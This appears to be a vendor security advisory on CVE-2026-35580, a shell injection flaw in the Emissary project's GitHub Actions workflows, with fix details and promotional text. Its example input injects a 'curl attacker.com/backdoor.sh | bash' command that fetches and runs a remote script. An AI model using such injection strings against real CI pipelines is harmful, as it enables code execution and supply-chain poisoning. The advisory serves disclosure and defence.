CVE-2026-35580

CVE-2026-35580 is a critical-severity command injection vulnerability in gov.nsa.emissary:emissary (maven), affecting versions < 8.39.0. It is fixed in 8.39.0.

Summary

Three GitHub Actions workflow files contained 10 shell injection points where
user-controlled workflow_dispatch inputs were interpolated directly into shell
commands via ${{ }} expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.

Affected Files

Workflow file Injection points
.github/workflows/maven-version.yml 4
.github/workflows/cherrypick.yml 5
.github/workflows/maven-release.yml 1

Details

GitHub Actions ${{ }} expressions inside run: blocks are substituted before
the shell interprets the command. When a workflow_dispatch input is placed directly
in a run: block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.

Example, maven-version.yml (before fix)

- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"

A malicious input such as 1.0.0"; curl attacker.com/backdoor.sh | bash; echo "
would be interpolated directly into the shell, executing arbitrary commands with
the job's GITHUB_TOKEN permissions (contents: write, pull-requests: write).

PR #1286, Environment variable indirection

Replaced all direct ${{ inputs.* }} interpolation in run: blocks with
environment variable indirection. Inputs are assigned to env: at the step level,
then referenced as shell variables inside run:.

# After (safe, input is never interpreted by the shell parser)
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/$IN_NEXT_VERSION" >> "$GITHUB_ENV"
  env:
    IN_NEXT_VERSION: ${{ github.event.inputs.next_version }}

PR #1288, Input validation

Added strict regex validation steps that run before any input is used:

  • maven-version.yml: Validates next_version matches ^[a-zA-Z0-9._-]+$
  • maven-release.yml: Validates release_suffix matches ^[a-zA-Z0-9._-]+$
  • cherrypick.yml: Validates commits matches ^([0-9a-f]{7,40})(\s+[0-9a-f]{7,40})*$

All jobs now also use shell: bash via defaults.run.shell to ensure consistent
shell behavior.

Workarounds

There is no workaround other than upgrading. Organizations that have forked
Emissary should apply the same environment variable indirection and input
validation patterns to their workflow files.

References

Impact

  • Arbitrary code execution within the CI/CD runner
  • Repository modification via the contents: write token (push malicious commits)
  • Supply chain poisoning, downstream users who clone or build receive compromised code
  • Credential exfiltration from the GitHub Actions environment

Untrusted input is inserted into a command that is later executed by the application, allowing the attacker to alter the intent of that command. Typical impact: arbitrary command execution in the application's environment.

CVE-2026-35580 has a CVSS score of 9.1 (Critical). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (8.39.0); upgrading removes the vulnerable code path.

Affected versions

gov.nsa.emissary:emissary (< 8.39.0)

Security releases

gov.nsa.emissary:emissary → 8.39.0 (maven)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Fixed in two PRs merged into release 8.39.0:

Frequently Asked Questions

  1. What is CVE-2026-35580? CVE-2026-35580 is a critical-severity command injection vulnerability in gov.nsa.emissary:emissary (maven), affecting versions < 8.39.0. It is fixed in 8.39.0. Untrusted input is inserted into a command that is later executed by the application, allowing the attacker to alter the intent of that command.
  2. How severe is CVE-2026-35580? CVE-2026-35580 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of gov.nsa.emissary:emissary are affected by CVE-2026-35580? gov.nsa.emissary:emissary (maven) versions < 8.39.0 is affected.
  4. Is there a fix for CVE-2026-35580? Yes. CVE-2026-35580 is fixed in 8.39.0. Upgrade to this version or later.
  5. Is CVE-2026-35580 exploitable, and should I be worried? Whether CVE-2026-35580 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-35580 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-35580? Upgrade gov.nsa.emissary:emissary to 8.39.0 or later.

Other vulnerabilities in gov.nsa.emissary:emissary

CVE-2026-35582CVE-2026-35581CVE-2026-35580CVE-2026-35571CVE-2025-27508

Stop the waste.
Protect your environment with Kodem.